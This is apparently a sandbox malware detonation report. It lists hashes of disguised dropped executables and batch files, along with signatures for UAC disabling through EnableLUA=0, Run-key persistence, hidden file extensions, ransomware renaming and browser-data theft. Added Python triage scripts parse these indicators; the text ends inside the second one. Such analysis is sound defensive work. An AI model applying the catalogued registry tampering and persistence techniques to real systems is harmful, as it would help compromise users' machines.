SHA512 c16d998a80d9dc1e9aafc4e302eae5722df414d7f5c32790a379a181166491df06b600f6e2662663814a03f39e7b75c203a5347ab467f5083859a420c9eb5ed2

C:\Users\Admin\AppData\Local\Temp\YAoa.exe

MD5 83623ba1bceee0ee23f1b753cd9fcb9a
SHA1 ae295b3bfb66f80d79924c449efd469752a0c363
SHA256 d2278c7ee2b84d7cfb02d61ba248bd1c4bab5a8fe1c4b56eae5ab410c5c8d289
SHA512 2d20023e339f0eada450fadfb18c09ea3a5ef5ae750ed9494115aa0f80f2608f51eb911a247baca734a1f5d03e23bd137463ca45b85d51970ce66bf908fe83d1

C:\Users\Admin\AppData\Local\Temp\AMsK.exe

MD5 cb03a360d9ebd9c0d0c8c6ff3eba0e07
SHA1 f34829524c7e936e2e563755e76f6e365dc067fc
SHA256 0c0420cabae64e2f7f45f9c8a429cea765cfe98364a6b59c2f6dbf0fb8db000a
SHA512 4792297864a21cbc2f6309cd5c5e65adc20124d3293480bf36ebf966f8468a7a5701a3fb56fc07aa9110e89cd584fae53e5b94e007462303931f9e0aacb8efec

C:\Users\Admin\AppData\Local\Temp\GskM.exe

MD5 4e478ae027a6656cd855a4803c2e28e6
SHA1 a7db7c1f8406cec4a03700c697d8d2ac9814062c
SHA256 35de8b9b70c0907b0d76e2fd3f10216e5f06689f2cb697f670e5688919ad00e6
SHA512 449711410df6a13d08ba3f4266f71c44ccc88f38c648d5bcf5e18425720bb28ac97cec12440612c955b93ee2e0e2a81834369bafcf0435cdd735aa8321328e00

C:\Users\Admin\AppData\Local\Temp\uIQa.exe

MD5 43ac1d6351f7ed4f18c217065d432796
SHA1 3af9b63349a837dbcf8551fa8fc96dcbb49a6921
SHA256 24af950043dff0e95deb698a2a761661d8b95e7bfd027ecc9f7099c7b9cefd95
SHA512 b7140b633925a5007f1e8a52be4d550e894a770df94a2f72af116e35304ab60307e3ae1efb3aaf950b7314e611d1331ec46bbd26bfea5f98b320a64ac1e03676

C:\Users\Admin\AppData\Local\Temp\eYAO.exe

MD5 8135249bd7d8ba869d0e1a24397dbbb0
SHA1 ea49697ab29777a96012eec9456bed1bc8dcbde8
SHA256 ba969fb49ec9a54222706507c13e485f31854cd1c83c3ffa13624d52322302e0
SHA512 e8cfff639df73d2de0e8b12c66a9b6ef5a1e28cc4215143b7c974dd2bb7491350a04ee908461b35cdb22fb77be382b4681984476d253df8c38e102f28ba2d2c8

C:\Users\Admin\AppData\Local\Temp\igws.exe

MD5 30a868c27784cadb4ee82a1157105183
SHA1 44c75be4f05232165199710bd3f52602b71a4f9b
SHA256 987bae68e350c578270fed8a828ac6fb9e10c4c1d56e197df977f814238430ed
SHA512 d8a28b575130793b6f90593857ffedffe42d5add937f46d2d37173cc0e195931efbd89097dd22b7c97c859cebe766b19f8f89574ec6a6d4bdf14e9254a91abec

C:\Users\Admin\Pictures\SubmitSelect.gif.exe

MD5 7214e873d931582ba64bf4a62bfd7135
SHA1 f62ff456ada96427312dd0223a1ba4f19fe50746
SHA256 e8ab1519c52df5623e49947ec1420db3fac7dd32a57cf3f5d20c17bd5bc97267
SHA512 5b8907218007083a1e30d92ca6b76c9a48347729f167c059759909c21a49dd5ced226222cd91463647195e1e07b64d306fcf049df368b8905369fe7bd54073ff

C:\Users\Admin\AppData\Local\Temp\wgUo.exe

MD5 422c1ce1f33faf0bb230ce8cab500c44
SHA1 cf1ef2eab0111e70d9ae33380209bb4ba879105b
SHA256 431b1034970c2ed12470357f847cb963f435c28355cef9cb9d95362a24675cc9
SHA512 c87aa83d76b8f7b2db3fea83a2f4b121bbb4de915cf66e24cb9bcf015f9d2d2ea937f195ed3fdd5edec9342031d521ae4f0d420d70b4613b126c5818d1991428

C:\Users\Admin\AppData\Local\Temp\OQsE.exe

MD5 1a35ec990595bc956ccf1087206dbd63
SHA1 c1a042a1c29ae84beeb55072dce3b27f10c85141
SHA256 6e8875a270bdad63e32e3255fa2b0465172e603f2ed8ee8e5ddfa00dc5684044
SHA512 0eedb108123e4da73c7a35e5eaa382d115372b43a70d0755fb4f9e8056d8fd19d4599270b09c3e707d7357de9757814662681f15709d6dbd701a87622540f109

C:\Users\Admin\AppData\Local\Temp\cgYcQoAA.bat

MD5 950b1fe25b26499a67a7c5f703a3f1f7
SHA1 c4580cfd35520e3bc5c8bb0fefa12ee5d8ca313b
SHA256 05be1aeb8409a3b4ddf3f87f02158031d9fa293c73552c11739c7189698ebf5e
SHA512 4255145bbeba7769f7f828f993e1e98009869516b632c136ea709edf808a0d893185a3413190d417cda6d2519dce4c9e211c5dc05185232d4b704e2f66bacd0f

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.exe

MD5 5e810faf335dc32c479d36a3ca273e90
SHA1 8a6b43b4732ba36657a6214802adfa10e53fed26
SHA256 7b381b0aa4e7ead19b1c4ea6547b2573e66341d68fe234cbebe5f9a0551e884a
SHA512 f9fc5904ac0f4c54cbf0435a6a06fe7c188d5effd9da34b560eb78c99a44d4df9ebf15958435ca7af4030b640953c002d8973bdd87f5ba417cf605ef3b772cd8

C:\Users\Admin\AppData\Local\Temp\cWIs.ico

MD5 5647ff3b5b2783a651f5b591c0405149
SHA1 4af7969d82a8e97cf4e358fa791730892efe952b
SHA256 590a5b0123fdd03506ad4dd613caeffe4af69d9886e85e46cbde4557a3d2d3db
SHA512 cb4fd29dcd552a1e56c5231e75576359ce3b06b0001debf69b142f5234074c18fd44be2258df79013d4ef4e62890d09522814b3144000f211606eb8a5aee8e5a

C:\Users\Admin\AppData\Local\Temp\OAwi.exe

MD5 eb5b61dc1783b0f9c7769fe36f56ceac
SHA1 22a812cba58f35b411ce73d8b2101742297f208c
SHA256 108c873e4f660c15acab1c7ffe719cda72b4b99be6ec947031eccb9cc0d2b8a3
SHA512 20fa40b45a944b09035a7462d45e5c07f333e181c037bb7d468ae3aba8c63dfc55ef9947221c8e3898c3d0944641dd3cb297c7a859040ba0eaba384d9c54e206

C:\Users\Admin\AppData\Local\Temp\cmggEIUI.bat

MD5 def8f61c797735c6e1fe85915fa3dcfb
SHA1 b337d76ef1592147b44e5e055373fd14923f9d80
SHA256 1840a15978c050900acd1e1fbaad5ac5590b3681fee9097b4b9de70453bdc4e1
SHA512 3aa4ce02da4ed495bc6c54299e7cc79f09d0acfdad655035db59fcbcb007808002884dba6546d857ea755c63b35e4bb7f70597bc4f6241ee19e77e8caf4d2893

C:\Users\Admin\AppData\Local\Temp\owEI.exe

MD5 56d5d4c96af0613f3fe61878d77a6dd8
SHA1 9863291a1030c5e9c566d0ee908072b73645f2a8
SHA256 01dd7fd0cfd64fb3bfbd708522214f340680aa84d856a7e88c375856c9fff8be
SHA512 3d6769404cf11e5efc4c7ed4a2331907de133cac3cff910790932337562db9e46fc1e24afb359a7c58e4a7e10293d86a462716c87363feb39a28f33fa6282415

C:\Users\Admin\AppData\Local\Temp\uYsQ.exe

MD5 003743dcf321e150d8b01e5426132a70
SHA1 117cc748b075940ec549839918f27cfaeebfe5a7
SHA256 dd5da96c205b8a58e2ddd074a5ea06a072f87d45769d692f0a42ee6d614eaeb2
SHA512 907de65a0f85c81ec612c493d792efc6e27b8c15d4ca336a74f3f190aa1de9d8967f59893774302f08aa6d53b6e8555f3f3b64c960a5da13fca42c9ac0aa6fd4

C:\Users\Admin\AppData\Local\Temp\QoMK.exe

MD5 372418a6024e02779377ec707a5b606f
SHA1 d919a015470ddc98a0569fb4231fb9f76c98e01e
SHA256 8c1909aafc294f5e9bec6859a21c306a1a18189f293e95bb75667e0e34c51b6f
SHA512 016a397019b20a666d4b3b64e2c87c280076d3041e18aa617a5d23a4d569e160aad95c291c875a4045857e7c955849dd7f0018da574c600484a9ed7f0027d457

C:\Users\Admin\AppData\Local\Temp\aoci.exe

MD5 ee7649f183795eabf0fb34094f05983e
SHA1 fc621970758b87015395283083bd6081c8254079
SHA256 48059fc3289900b324bb35fce04d264a31137baf24615cfadebdcb24505e1b5e
SHA512 c9f21e97ae3cd11639d100345a9a4ef38a1d30ab464fa2e281769ccc672daebf4a76330049e28da382aeedf3804354d09af57cbba46c27889556ca377db18826

C:\Users\Admin\AppData\Local\Temp\oyIM.ico

MD5 964614b7c6bd8dec1ecb413acf6395f2
SHA1 0f57a84370ac5c45dbe132bb2f167eee2eb3ce7f
SHA256 af0b1d2ebc52e65ec3f3c2f4f0c5422e6bbac40c7f561b8afe480f3eeb191405
SHA512 b660fdf67adfd09ed72e132a0b7171e2af7da2d78e81f8516adc561d8637540b290ed887db6daf8e23c5809c4b952b435a46779b91a0565a28f2de941bcff5f1

memory/2756-2034-0x0000000000400000-0x000000000046F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AmsccgYk.bat

MD5 2e0672c17208c7ee2732674bc95b4b86
SHA1 f0da797c3b1be1e6a646dffa51b766a03d0c08a1
SHA256 3979d384b97154bfbfb86a6ec3294601c2b3c98d568de78b96697f67a286cc64
SHA512 fc718e19cdfbb00bd794e12ef8f26a0b04dfd23eaea9bf246e2da7cec1cec9f81f199e846616de7491624f4dbffc9af27cbd73e1d84957605b1d343270982cc0

C:\Users\Admin\AppData\Local\Temp\akwW.exe

MD5 3155b64884e390eee7a3afa89a4ccb7a
SHA1 6a97ee929e6ac19186ccdfdee2342786a4ffc944
SHA256 caf760a66fbce612568514265d711f0b6a260812a4b5d38e88048cf2b88520e6
SHA512 db7ede76f16ad2316e516442019b09246fa85d1383cbdd3cdd33d8e5a4ee755b0ab5c6ad9ba97c9ae395ce2b263a69b25dc298b805defecd37e0a64fdf5b3d0b

C:\Users\Admin\AppData\Local\Temp\qYgc.exe

MD5 3a20279bc331f36c11cb7b3a99cc824a
SHA1 25b66d911122e95047c17d5890fe93711c313d45
SHA256 34112780ef4eea416baa4333dc005f086bbebc8febe69d64935d9b19b4e005b0
SHA512 34063babc7755c10fa2a570ee605f8ccba7361a65ff670de12553697160240b5d59d81a974cb022936cb801ffc2c93c61268909af5b095ca8df77e034056b50c

C:\Users\Admin\AppData\Local\Temp\KkQI.exe

MD5 c9a36a737afa2bb382a101b15e961b55
SHA1 f3c63bca708bb9fc214e81116ab6471c9327925c
SHA256 7ef4872cdcb23628a1b83ca9d69e9befafcd0fe8359a51cba7959a9396bcae47
SHA512 b4fded4c375a7b04080fec0e6595d841b110ec697f1b76363edb9f031e86cfb43bde923ffa35b26dc179242c63c3704b6eaa044af2437ea2e58b336cb1a5f599

C:\Users\Admin\AppData\Local\Temp\AEkC.exe

MD5 78f1948662f388f3574a450f20a3b8a9
SHA1 e20fe56f99551786ce1f6b8da9194864608e1bec
SHA256 b5aa14097d5a53c30fb8cb2900a0e620fdd5a13196c13b887099c42c61f8e0ad
SHA512 5c43971fe24a130090fd0c17d49ed5ffff5ddd72e3d87414330957e4f1dad02a7e7256cb93c79a8db8f3b9e7dd816c4629d9a40a046ae53dc6795186aa434b66

C:\Users\Admin\AppData\Local\Temp\csUu.exe

MD5 b9c1f32273a9cb8bfd3a7e560149c4ad
SHA1 77a9fc80e851e98d1f9244226b232ee120cf769a
SHA256 3b038f4c2c83d87021c2edeb83c06cb277fdd0e08ec4cd838ec6d4f8d88ba54b
SHA512 ab522a2028bc3a49c523ea1b01ac591154fca8cbfddc6ce8609da2cfbb05d556e5fa940a66691ba943faabc4f4b2334c77ea35390af036e3786de9501aa5a8a9

C:\Users\Admin\AppData\Local\Temp\kYUG.exe

MD5 8ecf19bd6c869c83dd793d1eadb86318
SHA1 0d400ee83153f53071175a615d1d7258a2c5d5b0
SHA256 2b91e663874182c8062442d3b1dd45ed8122a028653e2bf5b6bc3a8acc8a5181
SHA512 a2d1a295ec6dcb1fb25ad66ef80336aae7acd5f130b28cef2615659e83a35a3ace1ce1579c93c269fab1fdfe17785eb0d75f78a95f7f39e7c4111a9c3c9e91d4

C:\Users\Admin\AppData\Local\Temp\qcMo.exe

MD5 ca9ebf19ee3ff87bc9da9b3b8608ed5b
SHA1 03c1acaadbdf791d0761beac32ac37cf7cb22b3d
SHA256 a07aa1af46c9463bebb639e5fde1466f357266b29a6562e3ccea6e8e5e840c03
SHA512 396b6e68f91aedbc5ceb07e6b4020be76904bd016fa7fc6f61f4bcd2c92b72707df0d35add1c6fcb41834bff2f2658e07f980dacdc9de3334f1d4f6aa28ca893

C:\Users\Admin\AppData\Local\Temp\zmwcoIQE.bat

MD5 4b044d0c5e33d906ccf3bdc26ada322f
SHA1 f765d56dee922e36a96d9ae4208eea4711d64e16
SHA256 b939956d50b7e93194ba58290f59e5894c0560e03df1dbcdbb388380172f35e3
SHA512 2beaeb54a194cf462e553fbaea7afe3a752e9ad3ee0be495663c91f2404392bd8b758bd64809830f9608291cac9e998002333f20b00247beb7548cae6c0fb55a

C:\Users\Admin\AppData\Local\Temp\eIoM.exe

MD5 48d49a2a00803bfe74fdf216e9b6931c
SHA1 b3a68bb5d4afb3563779c4b5dbd6c98005238faa
SHA256 749821a5b0a1a8e6d5b688ae901cf98fbacb1f96407ba19ba11950bf5cc64dfd
SHA512 6671ce10bd237c3e0874a3fe74b915b32e70c097b9161b67f71be7a3e0577de5148755a58c30980bc9e31c978d8d556e4e5228b6e813ca13f154922b2b621fab

C:\Users\Admin\AppData\Local\Temp\mwMI.exe

MD5 8567e96f2ebb6a02b0d019382dcbed96
SHA1 656968531a50d810cd74198a2048fbbe7de42c56
SHA256 067b6a86d999221188ea25fe98b8df422d7a293e135932451b57a33a98eb9bb4
SHA512 db76f9f96108e600dbb81c38ceb294115c6e569b0c3b0cecb1f1d433adca6a90c3cee0cad4d39fac625acf9703e3ff3b0f8ddd88ba4ba71f9dcc4388828b5907

C:\Users\Admin\AppData\Local\Temp\goME.exe

MD5 317a94817766ed36c84ceccce1e31ebd
SHA1 501ff6c573903435f97bd85ae1c85cb5b3c7ca5d
SHA256 161cb8b98c55d2ae475a86d7947725eb861bcef13f312edbbfa19c768aa6e156
SHA512 538f1383b6e468bbf4c209654cc40640da1b41637100476cd6b140f21b3da1314a92abaa08dbdc4b86fab2d1021a8a9f15a6e6183a7eb620a94e25836cf3d6f7

C:\Users\Admin\AppData\Local\Temp\ooEU.exe

MD5 d91f6dcf4923529d1e7cc1307bacae2b
SHA1 2932ef8d3e7d0ead68d134045611ea2af61d16bf
SHA256 8f27e976d5ea9a862a6ef4248e20f52f7e03f4baa17087134d75ea930ada0b57
SHA512 42d5f6de2fcd4a288db8f52b4e804a9dd2898c8614fe3e55ff5b9b983e075d22049588ecc7eeceb348c6943d2fb88a0e9ecac1b470fc6ebf4b2e4a39001f78f6

C:\Users\Admin\AppData\Local\Temp\OoYq.exe

MD5 0a0c97c990d582733fd26e11a8083b15
SHA1 2fcc188ddbe5c75f24128f06b92d868679c603bf
SHA256 1b2652157607d48bc82f2b529f637025d41f2d183d66521d5c1a2659991a77d0
SHA512 1b1a4bda097e5dca857682179a972918f6deb7f46d9caa9c4806f1eaaaf9c783e3844dbf3ebff85a672e6977d1437be2e63a072c7e49d3a5e2788b6e8b28ef91

C:\Users\Admin\AppData\Local\Temp\WAsG.exe

MD5 c2ab4142cb839d078caa9ba3547dab8d
SHA1 dd569a571b58cf6a3ad1b92f98172728ace0366f
SHA256 68d5aba2e2e2be4876367465385c9e24502061747e34f979fe01dc577fa16f27
SHA512 486b8f5848f1204b210091d9ad0ae2bf9adf7377c38b75af31e7c6b558f644b3b699de36fedf5ac8d27cc54724fd520f74b8f83a1220807e7051cfd410887279

C:\Users\Admin\AppData\Local\Temp\Iowm.exe

MD5 9034251b3c382c31da508e630941b4c8
SHA1 978bfe24c7df66968186ab9569f3325c59209e60
SHA256 331af00892ab2ebb0a64717ca72ded219ffb7410917e5cdcf5671b6216418a16
SHA512 858dfeafbe6c9213407efe4949098491bf8389d96e9199b3056436378bb34b5af0fae55d01077baa529b8bf064e01102ad32553700ad763d88c649203158f203

C:\Users\Admin\AppData\Local\Temp\UkMQ.exe

MD5 bb986e63f0f5fe20c345bc7d1d3b75f2
SHA1 bc1c1b05b6d67a5c14b8deb2ae1da2003e5bce2e
SHA256 c8693e38ac61cbea94ab04d4c3a217122d3a44545075f52651f849ff2ef277b8
SHA512 4878cf2a249c939eccb551c1656a6e718306177413adf7340c73c7d133e09576a5f397d27a88ee3e01a6872e2ff59560e9af6cf6ae489532fa4ae8253f0df7cc

C:\Users\Admin\AppData\Local\Temp\VwUsAgsY.bat

MD5 d1332d376414acf6b0b17e3ffb5a6843
SHA1 93cd144ef6e032c3c30f1cb19f41e62f473ee0d4
SHA256 fea73af100a95078621bd39aa6b0f579d82759e43836188c1f12d46799840b86
SHA512 f662b454888bf9bcac43ce18aea44bb0f5bf3e7e260983bb9edb0feaeee30946bb8774b1bce096498388de888f8aebee183f3681563217109ac0b980fa059fbc

C:\Users\Admin\AppData\Local\Temp\GYky.exe

MD5 9f1a4e8b369540b4b6005f48b51a8592
SHA1 7adca178ec3eae1662fc12b0877ff2c933541fa2
SHA256 8d964215e3f0e4b09fef248141c19563cc6ca86e42358ded15da1079f3d43f88
SHA512 84aeb2dc859c2a1e147d3dfd786bf7de5e0076f3fc42c9d729ed2b2ccaf4b6d82e93642f6d101bbd4743866c5bc793a94e463ef82bed5e2c26346d00d647092e


Analysis: behavioral2

Detonation Overview

Submitted

2024-10-20 02:40

Reported

2024-10-20 02:42

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
(identical row listed 64 times in the report)

Renames multiple (52) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
N/A N/A C:\ProgramData\WCwgcgww\QuYEoUUs.exe N/A
N/A N/A C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YUgQMkcI.exe = "C:\\Users\\Admin\\bgMQIwoo\\YUgQMkcI.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QuYEoUUs.exe = "C:\\ProgramData\\WCwgcgww\\QuYEoUUs.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YUgQMkcI.exe = "C:\\Users\\Admin\\bgMQIwoo\\YUgQMkcI.exe" C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QuYEoUUs.exe = "C:\\ProgramData\\WCwgcgww\\QuYEoUUs.exe" C:\ProgramData\WCwgcgww\QuYEoUUs.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QuYEoUUs.exe = "C:\\ProgramData\\WCwgcgww\\QuYEoUUs.exe" C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bAIksggA.exe = "C:\\Users\\Admin\\IWkYMYcQ\\bAIksggA.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\eWMwoIIE.exe = "C:\\ProgramData\\resAEcUc\\eWMwoIIE.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
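
The EnableLUA rows and the Run-key rows above are the two registry findings a responder will want to pull out of this report. The script below is an added example for this page, not part of the sandbox output or of the sample: it parses rows in exactly the flattened shape shown above (its six input rows are copied from the tables on this page), maps the kernel object paths to HKLM/HKCU, folds the WOW6432Node redirect produced by the 32-bit writer back onto the 64-bit logical path, and reports the UAC-disable writes and each persistence entry once, however many processes re-wrote it. The function names (parse_row, normalize_key, triage) are this example's own.

```python
"""Triage helper for the flattened 'Set value' rows in this report.

Added example for this page; it is not part of the sandbox output.  Every row
has the shape
    Set value (<type>) <key path>\\<value name> = "<data>" <process> N/A
and the rows below are copied verbatim from the EnableLUA and Run-key tables.
Nothing touches a live registry; the script only re-reads the report.
"""
import re
from collections import Counter

# Constructed input: six of the report's own rows (two of the 64 EnableLUA rows,
# the four distinct Run-key rows).
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YUgQMkcI.exe = "C:\\Users\\Admin\\bgMQIwoo\\YUgQMkcI.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QuYEoUUs.exe = "C:\\ProgramData\\WCwgcgww\\QuYEoUUs.exe" C:\ProgramData\WCwgcgww\QuYEoUUs.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bAIksggA.exe = "C:\\Users\\Admin\\IWkYMYcQ\\bAIksggA.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\eWMwoIIE.exe = "C:\\ProgramData\\resAEcUc\\eWMwoIIE.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A',
]

ROW_RE = re.compile(r'^Set value \((\w+)\) (\S+) = "(.*)" (.+?) N/A$')
USER_SID_RE = re.compile(r'^\\REGISTRY\\USER\\S-1-5-21-[\d-]+\\')
MACHINE_PREFIX = "\\REGISTRY\\MACHINE\\"


def parse_row(row):
    """Split one row into its type, key, value name, data and writing process."""
    m = ROW_RE.match(row.strip())
    if m is None:
        return None
    vtype, full_path, data, process = m.groups()
    key, _, name = full_path.rpartition("\\")
    # The report escapes backslashes inside REG_SZ data ("C:\\Users\\..."); undo it.
    return {"type": vtype, "key": key, "name": name,
            "data": data.replace("\\\\", "\\"), "process": process}


def normalize_key(key):
    """Turn the kernel object path into a hive-relative path.

    Returns (logical_path, redirected).  HKCU paths lose the SID, and a write
    that landed under HKLM\\SOFTWARE\\WOW6432Node (the 32-bit view a WOW64
    process is redirected to) is reported on its 64-bit logical path with
    redirected=True, so HKLM persistence from 32-bit and 64-bit writers
    compares equal.
    """
    if key.startswith(MACHINE_PREFIX):
        logical = "HKLM\\" + key[len(MACHINE_PREFIX):]
    elif USER_SID_RE.match(key):
        logical = "HKCU\\" + USER_SID_RE.sub("", key)
    else:
        return key, False
    redirected = "\\WOW6432Node\\" in logical
    return logical.replace("\\WOW6432Node\\", "\\"), redirected


def triage(rows):
    """Summarise UAC tampering and Run-key persistence from report rows."""
    out = {"uac_disable_writes": 0, "run_entries": set(), "writers": Counter()}
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        logical, redirected = normalize_key(rec["key"])
        out["writers"][rec["process"].rsplit("\\", 1)[-1]] += 1
        # EnableLUA = 0 switches UAC off at the next boot.  Policies\System is a
        # shared (non-redirected) key, which is why no WOW6432Node shows up
        # even though the writer is 32-bit reg.exe.
        if (logical.lower().endswith("\\policies\\system")
                and rec["name"].lower() == "enablelua" and rec["data"] == "0"):
            out["uac_disable_writes"] += 1
        if logical.lower().endswith("\\currentversion\\run"):
            hive = logical.split("\\", 1)[0]
            out["run_entries"].add((hive, rec["name"], rec["data"], redirected))
    out["run_entries"] = sorted(out["run_entries"])
    return out


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print("EnableLUA=0 writes:", result["uac_disable_writes"])
    for hive, name, cmd, redirected in result["run_entries"]:
        print(f"{hive}\\...\\Run\\{name} -> {cmd}" + ("  [WOW6432Node]" if redirected else ""))
```

Two caveats the rows themselves do not state: EnableLUA = 0 does not change the running session, UAC is off only after the next reboot, so on a live host check the value rather than waiting for a missing prompt. And the HKLM entries written by this 32-bit sample physically sit under WOW6432Node while the HKCU ones sit in the user hive; query both views (or compare on the normalized path as above) when hunting for the same entry across hosts.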

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\bgMQIwoo\YUgQMkcI C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A
File opened for modification C:\Windows\SysWOW64\sheInitializeLock.docx C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheJoinOptimize.docx C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\shePingUnblock.png C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheReceiveConvertTo.xlsx C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\bgMQIwoo C:\ProgramData\uQMsEIoc\AMAkoQUc.exe N/A
File created C:\Windows\SysWOW64\shell32.dll.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheSendRename.wma C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
File opened for modification C:\Windows\SysWOW64\sheSwitchNew.mp3 C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
(64 rows listed in the report, all on the same key: reg.exe 26, cmd.exe 25, 7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe 9, cscript.exe 4)

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
(identical row listed 64 times in the report)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
(identical row listed 64 times in the report)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe N/A
(identical row listed 64 times in the report)

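The WriteProcessMemory table that follows lists each parent/child pair several times and gives only PIDs and image paths, so the actual process tree is easier to read once rebuilt. The script below is an added example for this page, not sandbox output: its input is the 16 rows of that table reconstructed from their columns (the constants SAMPLE, CMD, REG, DROP1 and DROP2 are simply the image paths from those rows), and the function names are this example's own. It collapses duplicate edges, counts the writes per edge, prints an indented tree, and flags the one edge where a helper process starts a fresh copy of its own parent's image.

```python
"""Rebuild the process tree from this report's WriteProcessMemory rows.

Added example for this page; it is not sandbox output.  The rows in the
table below have the shape
    PID <parent> wrote to memory of <child> N/A <parent image> <child image>
and the same parent/child pair is listed once per write, so duplicates are
collapsed and counted before the tree is rendered.
"""
import re
from collections import Counter, defaultdict

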